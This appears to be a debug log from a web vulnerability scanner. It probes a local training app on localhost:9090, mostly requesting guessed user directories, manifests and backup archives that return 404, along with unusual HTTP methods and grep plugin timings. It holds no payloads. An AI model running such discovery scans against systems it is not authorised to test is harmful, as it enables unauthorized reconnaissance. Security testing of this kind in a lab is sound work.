(id=176,from_cache=0,grep=1,rtt=0.25,did=g0r6Dn67) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/cachemanifest returned HTTP code "404" (id=181,from_cache=0,grep=1,rtt=0.10,did=ZSSDWZDD) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=178,from_cache=1,grep=1,rtt=0.03,did=BbS14ofy) [Wed Feb 12 09:36:17 2020 - debug] "http://localhost:9090/" (id:178, code:302, len:28, did:BbS14ofy) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/www-data/ returned HTTP code "404" (id=182,from_cache=0,grep=1,rtt=0.29,did=bnvbVnk1) [Wed Feb 12 09:36:17 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/robots.txt") took 0.61s to run [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/~ntp/ returned HTTP code "404" (id=187,from_cache=0,grep=1,rtt=0.09,did=QUu3rt6p) [Wed Feb 12 09:36:17 2020 - debug] REPORT http://localhost:9090/ returned HTTP code "404" (id=188,from_cache=0,grep=1,rtt=0.26,did=IkjuCG6H) [Wed Feb 12 09:36:17 2020 - debug] localhost:9090 connection pool stats (free:40 / in_use:10 / max:50 / total:50) [Wed Feb 12 09:36:17 2020 - debug] GET http://localhost:9090/ntp/ returned HTTP code "404" (id=185,from_cache=0,grep=1,rtt=0.11,did=N162iday) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/sshd/ returned HTTP code "404" (id=180,from_cache=0,grep=1,rtt=0.04,did=OWfFv92o) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/~apache/ returned HTTP code "404" (id=186,from_cache=0,grep=1,rtt=0.17,did=oPfDULs8) [Wed Feb 12 09:36:18 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:18 2020 - debug] serialized_object.grep(uri="http://localhost:9090/robots.txt") took 0.12s to run [Wed Feb 12 09:36:18 2020 - debug] blank_body.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] credit_cards.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] websockets_links.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] csp.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] dom_xss.grep(uri="http://localhost:9090/robots.txt") took 0.00s to run [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/~sshd/ returned HTTP code "404" (id=184,from_cache=0,grep=1,rtt=0.05,did=3xFPVQvb) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/_ntp/ returned HTTP code "404" (id=183,from_cache=0,grep=1,rtt=0.13,did=a5EEVNhX) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/apache/ returned HTTP code "404" (id=191,from_cache=0,grep=1,rtt=0.18,did=p5QVABVX) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/gears_config.json returned HTTP code "404" (id=190,from_cache=0,grep=1,rtt=0.12,did=JnpmgnN5) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/sitemanifest.txt returned HTTP code "404" (id=189,from_cache=0,grep=1,rtt=0.24,did=KOvZFxcG) [Wed Feb 12 09:36:18 2020 - debug] Connections with more in use time: No connections marked as in_use have started to send the first byte. They are in_use but still inactive. The in_use connections are: 2efc049900345f70 5aa0b4376f902084 510958b4bb1ade75 ee57bf4e9093aa89 ea99060d2e3c1bee [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/~postgres/ returned HTTP code "404" (id=194,from_cache=0,grep=1,rtt=0.12,did=3pD3IYGg) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/gears-manifest returned HTTP code "404" (id=192,from_cache=0,grep=1,rtt=0.19,did=taLnBFy4) [Wed Feb 12 09:36:18 2020 - debug] GET http://localhost:9090/mysql/ returned HTTP code "404" (id=198,from_cache=0,grep=1,rtt=0.33,did=yn62ObgV) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/~named/ returned HTTP code "404" (id=197,from_cache=0,grep=1,rtt=0.31,did=9Cs0uSmt) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/offline-manifest.gears returned HTTP code "404" (id=200,from_cache=0,grep=1,rtt=0.20,did=Hhd310AX) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/named/ returned HTTP code "404" (id=193,from_cache=0,grep=1,rtt=0.26,did=vaaAmKk8) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/~radiusd/ returned HTTP code "404" (id=201,from_cache=0,grep=1,rtt=0.08,did=MwKFX3eT) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/offline_manifest.php returned HTTP code "404" (id=195,from_cache=0,grep=1,rtt=0.27,did=mHzqi3vZ) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/~mysql/ returned HTTP code "404" (id=199,from_cache=0,grep=1,rtt=0.20,did=x1QTlmLT) [Wed Feb 12 09:36:19 2020 - debug] GET http://localhost:9090/cache_manifest.txt returned HTTP code "404" (id=202,from_cache=0,grep=1,rtt=0.22,did=Z1FXTOvz) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/postgres/ returned HTTP code "404" (id=196,from_cache=0,grep=1,rtt=0.13,did=seMTHYRw) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/site-manifest.json returned HTTP code "404" (id=203,from_cache=0,grep=1,rtt=0.08,did=Q9UeBvIb) [Wed Feb 12 09:36:20 2020 - debug] UNLINK http://localhost:9090/ returned HTTP code "404" (id=207,from_cache=0,grep=1,rtt=0.22,did=8wp10ZFH) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/radiusd/ returned HTTP code "404" (id=206,from_cache=0,grep=1,rtt=0.09,did=DVNuX832) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/filesInCache.gears returned HTTP code "404" (id=204,from_cache=0,grep=1,rtt=0.28,did=DAiLlYdA) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/~ircd/ returned HTTP code "404" (id=208,from_cache=0,grep=1,rtt=0.24,did=ALSKKGf4) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/ircd/ returned HTTP code "404" (id=205,from_cache=0,grep=1,rtt=0.11,did=WxIjUv9Y) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/hacluster/ returned HTTP code "404" (id=209,from_cache=0,grep=1,rtt=0.17,did=dlAFrR5A) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/~tinysnmp/ returned HTTP code "404" (id=213,from_cache=0,grep=1,rtt=0.10,did=Y5Lpz5v9) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/tinysnmp/ returned HTTP code "404" (id=212,from_cache=0,grep=1,rtt=0.27,did=xl3IGUhQ) [Wed Feb 12 09:36:20 2020 - debug] "http://localhost:9090/" (id:178, code:302, len:28, did:BbS14ofy) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/gears_manifest.txt returned HTTP code "404" (id=214,from_cache=0,grep=1,rtt=0.10,did=wnDr8QLe) [Wed Feb 12 09:36:20 2020 - debug] localhost:9090 connection pool stats (free:43 / in_use:7 / max:50 / total:50) [Wed Feb 12 09:36:20 2020 - debug] Connections with more in use time: (859514ff2302e122, 0.33 sec) (8e309178b5b40c35, 0.18 sec) (2efc049900345f70, 0.15 sec) (d18056b97c7890a7, 0.09 sec) (ea99060d2e3c1bee, 0.08 sec) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/manifest returned HTTP code "404" (id=210,from_cache=0,grep=1,rtt=0.12,did=koVgfOlR) [Wed Feb 12 09:36:20 2020 - debug] GET http://localhost:9090/~hacluster/ returned HTTP code "404" (id=211,from_cache=0,grep=1,rtt=0.08,did=ciMhvsTZ) [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/plone/ returned HTTP code "404" (id=218,from_cache=0,grep=1,rtt=0.36,did=GxnoWTK7) [Wed Feb 12 09:36:21 2020 - debug] NOTIFY http://localhost:9090/ returned HTTP code "404" (id=219,from_cache=0,grep=1,rtt=0.20,did=zj3kAWt9) [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/zope/ returned HTTP code "404" (id=215,from_cache=0,grep=1,rtt=0.06,did=ndUalIrb) [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/gearsmanifest returned HTTP code "404" (id=216,from_cache=0,grep=1,rtt=0.05,did=iVVV7KWA) [Wed Feb 12 09:36:21 2020 - debug] text_file.flush() took 0.00s to run [Wed Feb 12 09:36:21 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn" [Wed Feb 12 09:36:21 2020 - debug] console.flush() took 0.00s to run [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/tinydns/ returned HTTP code "404" (id=220,from_cache=0,grep=1,rtt=0.20,did=fyV76GdR) [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/offlinemanifest.php returned HTTP code "404" (id=217,from_cache=0,grep=1,rtt=0.18,did=yZqz83LZ) [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/gearsconfig.json returned HTTP code "404" (id=227,from_cache=0,grep=1,rtt=0.15,did=S7WceWwP) [Wed Feb 12 09:36:21 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 96, 'reject-seen-url': 26, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/interch/ returned HTTP code "404" (id=228,from_cache=0,grep=1,rtt=0.10,did=dEFPBI5N) [Wed Feb 12 09:36:21 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 96, 'reject-seen-url': 26, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/pwhois/ returned HTTP code "404" (id=229,from_cache=0,grep=1,rtt=0.19,did=WhRt5HbA) [Wed Feb 12 09:36:21 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 96, 'reject-seen-url': 26, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/~zope/ returned HTTP code "404" (id=226,from_cache=0,grep=1,rtt=0.26,did=ceYFFmEQ) [Wed Feb 12 09:36:21 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 96, 'reject-seen-url': 26, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/ldapdns/ returned HTTP code "404" (id=223,from_cache=0,grep=1,rtt=0.19,did=99XXNAST) [Wed Feb 12 09:36:21 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 96, 'reject-seen-url': 26, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:21 2020 - debug] GET http://localhost:9090/rbldns/ returned HTTP code "404" (id=233,from_cache=0,grep=1,rtt=0.19,did=xGlTsq36) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~plone/ returned HTTP code "404" (id=235,from_cache=0,grep=1,rtt=0.43,did=4bZZGq2b) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~rbldns/ returned HTTP code "404" (id=238,from_cache=0,grep=1,rtt=0.52,did=seiSZ1hI) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/site_manifest.json returned HTTP code "404" (id=224,from_cache=0,grep=1,rtt=0.35,did=cfxVjuD3) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~ldapdns/ returned HTTP code "404" (id=225,from_cache=0,grep=1,rtt=0.13,did=BDiAobdY) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=222,from_cache=0,grep=1,rtt=0.29,did=ZewVT46M) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~tinydns/ returned HTTP code "404" (id=221,from_cache=0,grep=1,rtt=0.10,did=n5d10TPn) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/offline_manifest.gears returned HTTP code "404" (id=236,from_cache=0,grep=1,rtt=0.12,did=jJquFM6K) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~interch/ returned HTTP code "404" (id=239,from_cache=0,grep=1,rtt=0.15,did=Q1AmmDcw) [Wed Feb 12 09:36:22 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.00 seconds [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~dnsbl/ returned HTTP code "404" (id=232,from_cache=0,grep=1,rtt=0.34,did=uSWZCpkb) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~pwhois/ returned HTTP code "404" (id=243,from_cache=0,grep=1,rtt=0.46,did=9PyGEoFo) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/cachemanifest.txt returned HTTP code "404" (id=237,from_cache=0,grep=1,rtt=0.24,did=WdGXu7HH) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/dhcp-fwd/ returned HTTP code "404" (id=241,from_cache=0,grep=1,rtt=0.31,did=BkBwQJt2) [Wed Feb 12 09:36:22 2020 - debug] GET http://localhost:9090/~dhcp-fwd/ returned HTTP code "404" (id=240,from_cache=0,grep=1,rtt=0.34,did=MJcW0RDP) [Wed Feb 12 09:36:23 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=21 returned HTTP code "200" (id=234,from_cache=0,grep=0,rtt=1.19,did=t7QQhWbS) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/crossdomain.xml returned HTTP code "404" (id=231,from_cache=0,grep=1,rtt=0.11,did=Zfb07nZW) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/dnsbl/ returned HTTP code "404" (id=230,from_cache=0,grep=1,rtt=0.32,did=aJdMEVoL) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/~tclhttpd/ returned HTTP code "404" (id=242,from_cache=0,grep=1,rtt=0.09,did=CPekFJeY) [Wed Feb 12 09:36:23 2020 - debug] OPTIONS http://localhost:9090/ returned HTTP code "200" (id=245,from_cache=0,grep=1,rtt=0.17,did=ISYYTaKR) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/tclhttpd/ returned HTTP code "404" (id=246,from_cache=0,grep=1,rtt=0.43,did=87Yl1mZ2) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/gears-manifest.txt returned HTTP code "404" (id=244,from_cache=0,grep=1,rtt=0.16,did=9vJzceic) [Wed Feb 12 09:36:23 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:0 / max:50 / total:50) [Wed Feb 12 09:36:23 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/cyphesis/ returned HTTP code "404" (id=247,from_cache=0,grep=1,rtt=0.16,did=7FQzKZjW) [Wed Feb 12 09:36:23 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:23 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: F9q5iRsP) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/lum/ returned HTTP code "404" (id=248,from_cache=0,grep=1,rtt=0.09,did=TKrnW9rd) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/filesInCache returned HTTP code "404" (id=249,from_cache=0,grep=1,rtt=0.06,did=Vlvnmv40) [Wed Feb 12 09:36:23 2020 - debug] GET http://localhost:9090/sitemanifest.json returned HTTP code "404" (id=252,from_cache=0,grep=1,rtt=0.02,did=1cijyE03) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/~lum/ returned HTTP code "404" (id=250,from_cache=0,grep=1,rtt=0.07,did=4AtOXN6y) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/offline-manifest returned HTTP code "404" (id=251,from_cache=0,grep=1,rtt=0.08,did=zBJyewuL) [Wed Feb 12 09:36:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 119, 'reject-seen-url': 28, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:24 2020 - debug] Will increase timeout to 3.30 seconds after HTTP socket error (did:4oCM9DF5) [Wed Feb 12 09:36:24 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.30 seconds [Wed Feb 12 09:36:24 2020 - debug] Raising HTTP error "BASELINE_CONTROL" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:4oCM9DF5). [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/~otrs/ returned HTTP code "404" (id=255,from_cache=0,grep=1,rtt=0.12,did=niSAHU8y) [Wed Feb 12 09:36:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 119, 'reject-seen-url': 28, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/~jive/ returned HTTP code "404" (id=256,from_cache=0,grep=1,rtt=0.12,did=UXKG1IeG) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/cache-manifest.json returned HTTP code "404" (id=258,from_cache=0,grep=1,rtt=0.29,did=ZO1vpzzA) [Wed Feb 12 09:36:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 119, 'reject-seen-url': 28, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/~cyphesis/ returned HTTP code "404" (id=253,from_cache=0,grep=1,rtt=0.19,did=OYK4wofi) [Wed Feb 12 09:36:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 119, 'reject-seen-url': 28, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/opencm/ returned HTTP code "404" (id=254,from_cache=0,grep=1,rtt=0.14,did=PdxFSIdg) [Wed Feb 12 09:36:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 119, 'reject-seen-url': 28, 'reject-out-of-scope': 4, 'accept': 24} [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/offlinemanifest.gears returned HTTP code "404" (id=262,from_cache=0,grep=1,rtt=0.33,did=RwWSKncg) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/kavuser/ returned HTTP code "404" (id=263,from_cache=0,grep=1,rtt=0.24,did=cqNsBb15) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/~opencm/ returned HTTP code "404" (id=261,from_cache=0,grep=1,rtt=0.21,did=pNKh7myy) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=259,from_cache=0,grep=0,rtt=0.17,did=F9q5iRsP) [Wed Feb 12 09:36:24 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: F9q5iRsP) [Wed Feb 12 09:36:24 2020 - debug] detailed._login() took 0.62s to run [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/manifest.txt returned HTTP code "404" (id=264,from_cache=0,grep=1,rtt=0.22,did=mNAHrr92) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/~kavuser/ returned HTTP code "404" (id=260,from_cache=0,grep=1,rtt=0.15,did=KpkqDr8o) [Wed Feb 12 09:36:24 2020 - debug] GET http://localhost:9090/Debian-exim/ returned HTTP code "404" (id=267,from_cache=1,grep=1,rtt=0.26,did=IYIZqbHe) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~Debian-exim/ returned HTTP code "404" (id=268,from_cache=1,grep=1,rtt=0.22,did=tnbMEsRE) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/otrs/ returned HTTP code "404" (id=257,from_cache=0,grep=1,rtt=0.26,did=jjqGk96y) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/clientaccesspolicy.xml returned HTTP code "404" (id=270,from_cache=0,grep=1,rtt=0.10,did=333If6dM) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/jive/ returned HTTP code "404" (id=265,from_cache=0,grep=1,rtt=0.13,did=S1TBPoKY) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/www-data/ returned HTTP code "404" (id=271,from_cache=1,grep=1,rtt=0.29,did=IjXbDOR8) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~kmem/ returned HTTP code "404" (id=269,from_cache=0,grep=1,rtt=0.01,did=bfiAlETH) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~www-data/ returned HTTP code "404" (id=272,from_cache=1,grep=1,rtt=0.25,did=Neb28eIC) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~amavis/ returned HTTP code "404" (id=273,from_cache=0,grep=1,rtt=0.10,did=RsHF7slP) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/gears-config.php returned HTTP code "404" (id=266,from_cache=0,grep=1,rtt=0.26,did=q7R85vtd) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/debian-tor/ returned HTTP code "404" (id=274,from_cache=1,grep=1,rtt=0.16,did=Wxc8dnaG) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~debian-tor/ returned HTTP code "404" (id=275,from_cache=1,grep=1,rtt=0.26,did=KiUbGWZb) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/gearsmanifest.txt returned HTTP code "404" (id=276,from_cache=0,grep=1,rtt=0.03,did=figWN5Gn) [Wed Feb 12 09:36:25 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:0 / max:50 / total:50) [Wed Feb 12 09:36:25 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/kmem/ returned HTTP code "404" (id=277,from_cache=0,grep=1,rtt=0.02,did=64Odu11J) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/amavis/ returned HTTP code "404" (id=278,from_cache=0,grep=1,rtt=0.24,did=ReBV4CvJ) [Wed Feb 12 09:36:25 2020 - debug] SEARCH http://localhost:9090/ returned HTTP code "404" (id=279,from_cache=0,grep=1,rtt=0.21,did=ngmvfw4e) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/site-manifest.php returned HTTP code "404" (id=280,from_cache=0,grep=1,rtt=0.04,did=MKnSdSfo) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/gears-config.gears returned HTTP code "404" (id=282,from_cache=0,grep=1,rtt=0.07,did=G5iRy8Lo) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/nobody/ returned HTTP code "404" (id=286,from_cache=0,grep=1,rtt=0.29,did=b0km9pmX) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/admin/ returned HTTP code "404" (id=284,from_cache=0,grep=1,rtt=0.06,did=2BDLmN9a) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/www/ returned HTTP code "404" (id=283,from_cache=0,grep=1,rtt=0.18,did=g3sZC9c6) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~test/ returned HTTP code "404" (id=290,from_cache=0,grep=1,rtt=0.09,did=oNhSp5wh) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/root/ returned HTTP code "404" (id=285,from_cache=0,grep=1,rtt=0.28,did=DiWtoTvs) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~root/ returned HTTP code "404" (id=293,from_cache=0,grep=1,rtt=0.24,did=V8gn8fS0) [Wed Feb 12 09:36:25 2020 - debug] Will increase timeout to 3.63 seconds after HTTP socket error (did:jfTuL5go) [Wed Feb 12 09:36:25 2020 - debug] Updating socket timeout for localhost from 3.30 to 3.63 seconds [Wed Feb 12 09:36:25 2020 - debug] Raising HTTP error "POLL" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:jfTuL5go). [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~www/ returned HTTP code "404" (id=281,from_cache=0,grep=1,rtt=0.06,did=3bVdaAlk) [Wed Feb 12 09:36:25 2020 - debug] find_captchas.discover(did="4fnUpKXg",uri="http://localhost:9090/") took 5.72s to run [Wed Feb 12 09:36:25 2020 - debug] oracle_discovery.discover(http://localhost:9090/, did=wjUj42dv) [Wed Feb 12 09:36:25 2020 - debug] [oracle_discovery] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~admin/ returned HTTP code "404" (id=288,from_cache=0,grep=1,rtt=0.19,did=zkNEsIAK) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~ftp/ returned HTTP code "404" (id=295,from_cache=0,grep=1,rtt=0.10,did=uHrcGAcM) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/localhost.tar.gz returned HTTP code "404" (id=296,from_cache=0,grep=1,rtt=0.24,did=USvpLrDP) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/offline_manifest returned HTTP code "404" (id=291,from_cache=0,grep=1,rtt=0.19,did=PUkv25Nj) [Wed Feb 12 09:36:25 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:2 / max:50 / total:50) [Wed Feb 12 09:36:25 2020 - debug] Connections with more in use time: (ea99060d2e3c1bee, 0.23 sec) (8e309178b5b40c35, 0.10 sec) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/ftp/ returned HTTP code "404" (id=289,from_cache=0,grep=1,rtt=0.07,did=Ks0kK5KN) [Wed Feb 12 09:36:25 2020 - debug] GET http://localhost:9090/~nobody/ returned HTTP code "404" (id=287,from_cache=0,grep=1,rtt=0.32,did=X8gpPU7Q) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/~backup/ returned HTTP code "404" (id=297,from_cache=0,grep=1,rtt=0.21,did=0DdneJQR) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/cache_manifest.json returned HTTP code "404" (id=292,from_cache=0,grep=1,rtt=0.25,did=Sdxcbk3N) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/backup/ returned HTTP code "404" (id=294,from_cache=0,grep=1,rtt=0.10,did=A5ihJTkS) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/test/ returned HTTP code "404" (id=298,from_cache=0,grep=1,rtt=0.13,did=j3IX6jQC) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/gears_config.php returned HTTP code "404" (id=299,from_cache=0,grep=1,rtt=0.18,did=St1hMYEO) [Wed Feb 12 09:36:26 2020 - debug] Will increase timeout to 3.99 seconds after HTTP socket error (did:PfC3TqEM) [Wed Feb 12 09:36:26 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.99 seconds [Wed Feb 12 09:36:26 2020 - debug] Raising HTTP error "PIN" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:PfC3TqEM). [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.cab returned HTTP code "404" (id=302,from_cache=0,grep=1,rtt=0.11,did=2cfh4KQG) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.gz returned HTTP code "404" (id=303,from_cache=0,grep=1,rtt=0.14,did=gc2AReof) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.gzip returned HTTP code "404" (id=305,from_cache=0,grep=1,rtt=0.07,did=YxQsOBS0) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/offline-manifest.txt returned HTTP code "404" (id=306,from_cache=0,grep=1,rtt=0.07,did=IGvzABp5) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.tgz returned HTTP code "404" (id=304,from_cache=0,grep=1,rtt=0.13,did=IbX5Xlxs) [Wed Feb 12 09:36:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 0. [Wed Feb 12 09:36:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 1. [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/gears_manifest.json returned HTTP code "404" (id=307,from_cache=0,grep=1,rtt=0.41,did=T9Qm717q) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.bzip2 returned HTTP code "404" (id=308,from_cache=0,grep=1,rtt=0.24,did=9l2EtHN5) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.7z returned HTTP code "404" (id=301,from_cache=0,grep=1,rtt=0.10,did=vL61qFEQ) [Wed Feb 12 09:36:26 2020 - debug] GET http://localhost:9090/localhost.zip returned HTTP code "404" (id=309,from_cache=0,grep=1,rtt=0.04,did=YPgS4OjZ) [Wed Feb 12 09:36:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 2. [Wed Feb 12 09:36:26 2020 - debug] 